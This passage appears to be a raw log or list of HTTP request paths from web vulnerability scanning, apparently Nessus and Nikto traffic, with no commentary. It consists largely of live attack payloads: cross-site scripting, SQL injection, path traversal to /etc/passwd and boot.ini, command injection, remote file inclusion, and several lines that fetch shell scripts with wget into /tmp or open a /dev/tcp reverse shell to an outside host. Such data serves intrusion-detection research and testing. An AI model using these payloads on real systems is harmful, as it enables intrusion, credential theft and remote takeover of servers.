content=\"testvlau=8517\">\n/scripts_emailmanager/\n/docs/mbeans-descriptor-howto.html\n/scripts/gbadmin.cgi?action=change_automail\n/top.php?stuff=\"&ver\\x0b>q71858742&rem\\x0b\n/phpwcms_template/inc_script/frontend_render/navigation/config_phplm.php?html_menu_dirpath=@rfiurl\n/recordings/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/awstats/awstats.pl?migrate=|echo;wget -p /tmp/  http://192.168.202.102:80/awseggqrffbrbrlxjrml5cgu6gdwaa/cbpxmnuvtn.sh;echo|awstats612845.txt\n/examples/servlets/servlet/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--\n/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/vsnlklmgzu0;echo|awstats591999.txt\n/bin/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/en-us/account/save.php?file_save=/etc/passwd\n/cgi-perl/ppdscgi.exe\n/yver8r9o.php3?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"|ping -w 10000 -n 1 1.2.3.4|rem \n/javascript/awstats.exe\n/help.php?q=\"&ver >q49814877&rem \n/lmw4r201.mscgi?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/~/<script>alert('vulnerable')</script>.aspx?aspxerrorpath=null\n/forum-ra.asp?n=../../../../../../../../../etc/passwd\\x00\n/scripts/vvh_tajyleqq.inc\n/accountlogon.cfm?rtn=1\"><script>alert(\"411735577546\");</script><\"234\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331908856\n/javascript/internal.exe\n/xsqln7eb.cfm?<script>document.cookie=\"testpcbb=9254;\"</script>\n/qb2xy9aw.fts?<script>cross_site_scripting.nasl</script>\n/cacti/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/tukodz3j.asp?<script>cross_site_scripting.nasl</script>\n/cgi-bin/index.php?op=default&date=200607' union select 1,733583767,1,1,1,1,1,1,1,1--&blogid=1\n/bl8sefdm.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9ko6m4c8.dll?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/um7xpn15.cfc?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/tukodz3j.pl?<script>cross_site_scripting.nasl</script>\n/scgi-bin/htimage.exe/path/filename?2,2\n/?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/scripts/language.php?data_dir=/etc/passwd\\x00\n/search/submit.php?config[\"sipssys\"]=http://192.168.202.118:8080/ghl9il?\n/manager/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/scripts/search.cgi\n/modules/forums/bb_smilies.php?default_theme=<script>alert('vulnerable')</script>\n/7u1pb2xi.nsf?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/scripts/p-news.php\n/ghostscript-7/\n/inc/download_center_lite.inc.php?script_root=@rfiurl\n/static///../../../../../../../..windows/win.ini\n/scripts/gdxlwjnlsr6i.asp\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6279432218.1\n/bl8sefdm.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bzuf9ozq.jspa?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/recordings/remindpasswd\n/ewc3rz1l.do?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/nyvdrhearingtranscript/\n/miz4r5hz.aspx?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/y8pmygrp.kspx?<script>cross_site_scripting.nasl</script>\n/zroo33l4.asp?<script>document.cookie=\"testiklc=904;\"</script>\n/help.php?q=\";del q69686889 #\n/7dbjwpw6.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script/tick/allincludefortick.php?path_to_code=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/l'inferno_(1911)/\n/en-us/n9xlumt5.php3?<script>cross_site_scripting.nasl</script>\n/ao22ww7y.asp?<script>document.cookie=\"testqppc=8767;\"</script>\n/subscriptionforms/\n/d7ktpmcq.x?<script>cross_site_scripting.nasl</script>\n/qb2xy9aw.jsp?<script>cross_site_scripting.nasl</script>\n/m2fpztty.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 368985119--\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,094227280668,4,5,6,7,8,9,10,11--\n/<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/j4drbkil.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/wps_shop.cgi?action=showartikel&cat=nessus&catname=nessus&art=|id|\n/help.php?q=\"del;q77231587&rem;\n/microsoft's-r0/\n/xxdiff-scripts/\n/index.php?id='union/**/select/**/0,0,1474576637,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/javascript/abc.exe\n/iajtej82.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/b1q8bywu.idc?<script>cross_site_scripting.nasl</script>\n/help.php?q=&ver\\x0c>q19831229&rem\\x0c\n/phpmyadmin/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/main.php?stuff=\"|sleep\\x097\\x09#\n/gmmhxssrco/\n/bxnyrhmh.jspa?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/javascript/common.exe\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"vj\\0001j\\0002\\0211\\0341j\\0001jfx\\0133\\0315\\0200\\0222\" >> /tmp/xmefwyizyj0;echo|awstats649475.txt\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,1139093737,0,0,0,0,0--\n/j4oqyvga.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/msvccl.exe/\n/id;784806083;fp;2;fpid;37/\n/examples/jsp/num/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/manager/sawmill6cl.exe?ho+{complete_version}\n/33y9gcqq.cfm?<script>document.cookie=\"testnvxc=4301;\"</script>\n/m2fpztty.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iv5vkgam.mscgi?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/examples/jsp/num/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/test.php?evalme=eval($_server[http_x_ipalsmokchfsaohgqgx]);\n/examples/jsp/colors/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/javascript/.passwd.ini\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/gcduwrjgmt.sh').\"]=1\n/main.php?stuff=';del q36774183 #\n/debug/dbg?host==<script>alert('vulnerable');</script>\n/subscription_storybot/\n/examples/jsp/jsp2/el/mapserv.exe?map=mapserver_detect.nasl.map\n/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/main.php?stuff='\\x0adel q61656815 #\n/examples/jsp/num/supporter/tupdate.php?groupid=change&sg='\n/h5i6crm3.idc?<script>document.cookie=\"testlihk=7070;\"</script>\n/javascript/.htpasswd.sfish\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"&ping;-w;10000;-n;1;1.2.3.4&rem;\n/main.php?stuff=\"ver&rem\\xa0\n/zroo33l4.do?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/main.php?logout=\"ping\\x09-w\\x0911000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/0z575z74.exe?<script>document.cookie=\"testuhsv=9753;\"</script>\n/en-us/account/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/w4996nr0.pl?<script>document.cookie=\"testttvs=7163;\"</script>\n/egaet53a.mscgi?<script>cross_site_scripting.nasl</script>\n/main.php?logout=&ver\\xa0>q67714263&rem\\xa0\n/edzaia0i.asp?<script>cross_site_scripting.nasl</script>\n/scripts_track/\n/manager/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/scripts/2sfdqydfaknx.sh\n/bin/c32web.exe/changeadminpassword\n/iv5vkgam.x?<script>document.cookie=\"testfosd=94;\"</script>\n/www/delivery/ac.php?bannerid=-1332008596+or+1=1+--+';passthru(base64_decode($_server[http_nessus_pqgrdtsr]));die;/*\n/fcgi-bin/echo2.exe?foo=<script>alert('vulnerable')</script>\n/javascript/library.exe\n/cgi-bin/index.php?file=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\n/manager/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/index.php?id='union/**/select/**/0,0,739400234,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/pages/htmlos/<script>alert('vulnerable');</script>\n/e9rx3ya4.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/q.exe\n/zqqemp6j.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/phpmyadmin/index.php?id='\n/scs86g1p.htm?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/javascript/temp.exe\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/ghl9il?\\x00\n/g3w7y7u5.asp?<script>document.cookie=\"testbfpq=3326;\"</script>\n/en-us/w4996nr0.cfm?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/projects/1/repository/annotate?rev=`0<&116-;exec 116<>/dev/tcp/192.168.202.118/39934;sh <&116 >&116 2>&116`\n/cgi-bin/windmail.exe\n/top.php?stuff=';sleep 9 #\n/search/index.cfm?<script>alert(\\\"vulnerable\\\")</script>\n/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=http://cirt.net/rfiinc.txt?\n/help.php?q=uname\\x09>q42213955\\x09#\n/javascript/2007.exe\n/manager/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/jackrabbit/search.jsp?q=%\"<script>alert(1331918979)</script>\n/top.php?stuff=\"\\x0dsleep 10 #\n/main.php?stuff=\"&ver\\xa0>q78321413&rem\\xa0\n/javascript/screenshot.exe\n/main.php?logout=\"\\x0auname >q33271476 #\n/sleuthscript1/\n/fa8p8lr8.asp?<script>cross_site_scripting.nasl</script>\n/lmw4r201.dll?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/examples/jsp/checkbox/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/0rufe52p.cfc?<script>cross_site_scripting.nasl</script>\n/scripts/2pwudii1mt22.php3\n/examples/jsp/jsp2/jspx/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/main.php?stuff=';del\\x09q87217698\\x09#\n/script/init/createallimagecache.php?path_to_code=@rfiurl\n/help.php?q=\"&ping -w 9000 -n 1 1.2.3.4&rem \n/d765w06j.cgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/listrec.pl?app=qmh-news&template=;ls /etc|\n/aj3pf49c.aspx?<script>document.cookie=\"testnofv=4170;\"</script>\n/scriptgallery/\n/oie504mr.jspa?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/cacti/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/main.php?stuff=\"&ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('vulnerable')</script>\n/en-us/hipkz026.php3?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/eg2u8pbv.fts?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/perl.exe?-v\n/cgibin/texis.exe/junk\n/examples/jsp/jsp2/jspx/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/main.php?logout=\"&ver,>q77644543&rem,\n/miz4r5hz.htm?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/mv8wxfy9.pl?<script>document.cookie=\"testrhbc=8184;\"</script>\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\\x00\n/script/fckeditor/editor/filemanager/upload/test.html\n/nmw0do67.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/index.php?src=1&_common=1&time=1331923205&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/javascript/cfg.exe\n/recordings/catalog.php?action=category_show&id='\n/yver8r9o.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=ver >q67139257&rem \n/examples/jsp/colors/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\\x00\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/swgnhpydbq0t?\n/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/cgi-914/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+n+esbql.com+>esbq\n/help.php?q=\"ver;>q71157849&rem;\n/sam's teach yourself adobe photoshop cs2 in 24/\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/fmccqnzzib;\"\n/?mod=<script>alert(document.cookie)</script>&op=browse\n/scripts/onwkbtts3uj1.shtml\n/en-us/account/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/main.php?stuff=&uname\\x09>q45915679\\x09#\n/ywaxntrx.htm?<script>cross_site_scripting.nasl</script>\n/en-us/account/index.php?user_langue=../../../../../../../../../../etc/passwd\n/scgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/pyscript/\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/2aibfaczmac8?\n/javascript/encyption.exe\n/webcgi/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/scripts/vhost.php?action=logout&time=1332009299\n/cgi-bin/search.jsp?q=%\"<script>alert(1331918979)</script>\n/admin/common/script.js.php.tmp\n/main.php?stuff=&del;q41243131&rem;\n/yr ardal a'i diwylliant/\n/vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=\";echo ''; echo `id `;die();echo\"\n/free-subscriptions/\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/xjmtpvepcz\"\n/top.php?stuff=;sleep 11 #\n/manager/direct.php?rf=/etc/passwd\\x00\n/?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/zqqemp6j.cfc?<script>cross_site_scripting.nasl</script>\n/starnet/addons/slideshow_full.php?album_name='1401440088\n/byrg33fw.do?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/tu_subscription/\n/examples/jsp/cal/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/examples/jsp/jsp2/el/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/edzaia0i.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/topic.php?tid='select\n/cacti/starnet/addons/slideshow_full.php?album_name='1929984197\n/en-us/7o5qp766.html?<script>cross_site_scripting.nasl</script>\n/pxagj7n7.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/azcrfs8d.nsf?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/b5xdqgz2.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/ddoworrl.x?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/examples/jsp/jsp2/el/embed/day.php?path=/etc/passwd\\x00\n/b4vng02k.x?<script>document.cookie=\"testtrlh=3672;\"</script>\n/phpmyadmin/starnet/addons/slideshow_full.php?album_name='919659949\n/0qhcnefz.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/wiki.php/<script>foo</script>\n/recordings/profil.php?id=1 <script>foo</script>\n/en-us/s7qus4g3.cgi?<script>cross_site_scripting.nasl</script>\n/scripts/rwwwshell.pl\n/n9xlumt5.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- \n/javascript/1000.exe\n/javascript/newticket.exe\n/../../../../../../../etc/passwd\n/main.php?stuff=\"ping,-w,10000,-n,1,1.2.3.4|rem,\n/scripts/nckowqpd4zng.cgi\n/examples/jsp/jsp2/jspx/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/esmozg5d.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/b1q8bywu.dll?<script>cross_site_scripting.nasl</script>\n/javascript/hu.exe\n/examples/jsp/error/view_user.php?list=1&letter=&sort_by='select\n/scripts/bveygnpo6hkw.cfm\n/cgi-sys/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/en-us/<script>cross_site_scripting.nasl</script>.cfm\n/gy23xnjq.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ddoworrl.kspx?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/ipb5ri?\\x00\n/examples/jsp/jsp2/jspx/mylog.html?screen=/etc/passwd\n/script_intro/\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/javascript/statements.exe\n/t7tm4m0b.do?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/documentation.html?phpmyadmin=../../../../../../../../etc/passwd\\x00\n/a0imiuf1.cfc?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/uc3w3bdi.exe?<script>document.cookie=\"testxllt=9940;\"</script>\n/7o5qp766.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>\n/top.php?stuff=\"ping\\x09-w\\x098000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/scripts/admin/index.asp\n/javascript/bob.exe\n/archive.php?scriptpath=http://192.168.202.96:8080/llumt7msyau5y??\n/9o6g5vkn.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/publisher/search.cgi?dir=jobs&template=;cat /etc/passwd|&output_number=10\n/script/tick/allincludefortick.php?path_to_code=http://cirt.net/rfiinc.txt?\n/en-us/dda2qr7j.cgi?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=q65675462&frm_passwd=&frm_referer=http%3a//192.168.23.202/top.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width=\n/examples/jsp/num/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/scripts_win/\n/examples/jsp/checkbox/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/examples/jsp/sessions/lang/lang.php?lang_path=/etc/passwd\\x00\n/scripts/texis.exe/?-dump\n/main.php?logout=\"\\x0arm q33271476 #\n/jscripts/folder_rte_files/module_table.php?editorid=xxl\";alert(410246083352);test=\"\n/examples/jsp/sessions/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/../config.dat\n/byrg33fw.cfc?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/servlet/webacc?user.html=../../../../../../../../../../../../../../../../../../boot.ini\\x00\n/scs86g1p.x?<script>document.cookie=\"testquyx=2820;\"</script>\n/phpmyadmin/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/top.php?stuff=\"\\x0adel q63768352 #\n/help.php?q='\\x0dsleep 11 #\n/javascript/shares.exe\n/gvx7m5ti.jspa?<script>document.cookie=\"testwldz=3506;\"</script>\n/examples/jsp/cal/search.php?submit=true&search=');\n/main.php?stuff='\\x0dsleep 10 #\n/manager/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/main.php?logout=\"ping\\x09-w\\x0911000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/examples/servlets/servlet/index.php?show=/etc/passwd\n/en-us/account/topic.php?tid='select\n/<script>document.cookie=\"testjnre=7328;\"</script>\n/scripts/cxvae_g3rjys.php3\n/vmi8bb12.kspx?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/top.php?stuff=';rm q56884429 #\n/main.php?logout='&uname >q25729498 #\n/igtf0zon.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/w04ukbv54ixz.cgi\n/ewc3rz1l.idc?<script>document.cookie=\"testkgqo=204;\"</script>\n/javascript/clock.exe\n/javascript/adm.exe\n/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.118:8080/ghl9il?\n/javascript/lucene.exe\n/examples/jsp/calmultihtml.pl?multi=/etc/passwd\\x00html\n/scripting_large/\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/swgnhpydbq0t??&cmd=id\n/main.php?stuff=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/en-us/w4996nr0.html?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/awstats/awstats.pl?migrate=|echo;wget -p /tmp/  http://192.168.202.102:80/awseggigiveblwt7dkhhg11ysqaqaa/wgwvwkorhp.sh;echo|awstats116875.txt\n/main.php?logout=\"\\x0drm\\x09q59885581\\x09#\n/javascript/.passwd.xsl\n/archive.php?scriptpath=http://192.168.202.96:8080/frznctvhi0i5??\n/pxagj7n7.htm?<script>cross_site_scripting.nasl</script>\n/jw64yq8u.htm?<script>document.cookie=\"testylfu=1313;\"</script>\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332009306\n/search.jsp?q=%\"<script>alert(1332008324)</script>\n/scripts/admin/index.php?cmd=login\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/iyeafeugpn0+>+/dev/null+&'); function v\n/my sister's hot friend 5/\n/index.php?id=_pb9wansu9'\n/l752x1ry.fts?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/index.php?op=default&date=200607' union select 1,1986790207,1,1,1,1,1,1,1,1--&blogid=1\n/fpnpp5zg.cgi?<script>document.cookie=\"testyias=101;\"</script>\n/examples/jsp/sessions/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/javascript/showmap.exe\n/x2gyorli.cfm?<script>document.cookie=\"testwhac=3130;\"</script>\n/8x6w469u.jsp?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/javascript/htpasswd.dll\n/soinfo.php?\\\"><script>alert('vulnerable')</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+33+c9+51+52+53+ff+75+00+ff+54+05+04+85+c0+7e+01+c3+68+61+64+00+00+68+54+68++>>ctdn\n/top.php?stuff=\"&ver,>q96325278&rem,\n/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/preview.php?php_script_path=http://192.168.202.118:8080/ghl9il??&cmd=dir\n//q32152879&#38;q1741&#34;q1741&#60;q1741&#62;q32152879\n/examples/jsp/sessions/wiki.php/<script>foo</script>\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908727\n/examples/jsp/num/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/examples/jsp/colors/download.php?language=/etc/passwd\\x00\n/?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/javascript/hole.exe\n/cgi-win/c32web.exe/changeadminpassword\n/cgi.cgi/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/examples/jsp/colors/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/uc3w3bdi.asp?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/fmnveedu.pl?<script>document.cookie=\"testgfbr=7014;\"</script>\n/help.php?q=\"&sleep\\x097\\x09#\n/recordings/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/zln2hm2z.do?<script>document.cookie=\"testblcp=8120;\"</script>\n/help.php?q=\"&ver\\x09>q33725356&rem\\x09\n/examples/jsp/num/faxsurvey?cat /etc/passwd\n/sunrise from hana's heaven 3/\n/windows script_information/\n/rv98iwjp.nsf?<script>cross_site_scripting.nasl</script>\n/en-us/account/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.pl\n/help.php?q='rm q24159687 #\n/um7xpn15.jspa?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+72+65+73+73+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00++>>esbq\n/javascript/root.exe\n/help.php?q=\"\\x0auname\\x09>q76195479\\x09#\n/main.php?stuff=del;q27761754&rem;\n/noscripthydrocodone/\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332009305',null,null,null,null --\n/pxagj7n7.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/javascript/htpasswd.part\n/w4996nr0.html?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/nmw0do67.x?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/topic.php?tid='select\n/edv3mapy.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='\\x0duname\\x09>q97796724\\x09#\n/opensiteadmin/scripts/classes/formmanager.php?path=@rfiurl\\x00\n/recordingsfaq.php?skin=../../admin/manager&tplpath=admin\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1403993486,0,0,0,0,0--\n/javascript/ids.exe\n/edzaia0i.nsf?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&uname >q94671165 #\n/setcookie.php?u=../../../../../../../../../../boot.ini\\x00\n/phpmyadmin/check_user_id.php?user_id=<script>foo</script>\n/bzuf9ozq.aspx?<script>cross_site_scripting.nasl</script>\n/forum.php?msg=2'force_mysql_num_rows_warning\n/help.php?q=\"&ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/top.php?stuff=\"\\x0auname\\x09>q18289426\\x09#\n/lmw4r201.html?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/eei78ore.html?<script>cross_site_scripting.nasl</script>\n/3hlysl2x.x?<script>document.cookie=\"testgjbe=8505;\"</script>\n/crypt-matrixssl/\n/l13b77e5.x?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/gepi/gestion/savebackup.php?filename=http://192.168.202.118:8080/zz5thkvtmlgl?&cmd=cat/etc/passwd\n/top.php?stuff='|sleep\\x0911\\x09#\n/examples/jsp/error/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/main.php?logout='\\x0arm q63177134 #\n/scripts/index.html\n/scripts/n4p4f4gtbhia.php\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331919183',null,null,null,null --\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1126849470,1437216392,1,1,1,1,1--&blogid=1\n/main.php?stuff=\"&ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/r3le3om5.mscgi?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=ver,>q34484887&rem,\n/javascript/~http.exe\n/script/template/index.php?main_page_directory=http://cirt.net/rfiinc.txt?\n/i7prbs22.php?<script>document.cookie=\"testjnre=7328;\"</script>\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,1131566153),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/cgi-bin/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/cgi-bin/protection.php?action=logout&siteurl=/etc/passwd\n/module/forum/forum.php?fd=http://cirt.net/rfiinc.txt?=';\n/examples/jsp/jsp2/jspx/phptonuke.php?filnavn=/etc/passwd\n/6qbynt4f.cfc?<script>cross_site_scripting.nasl</script>\n/subscriptions_ezpay/\n/scriptsmultihtml.pl?multi=/etc/passwd\\x00html\n<script>document.cookie=\"testwhac=3130;\"</script>\n/examples/jsp/colors/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/medical_transcription/\n/javascript/remove.exe\n/cacti/index.php?x=browse&category='union select 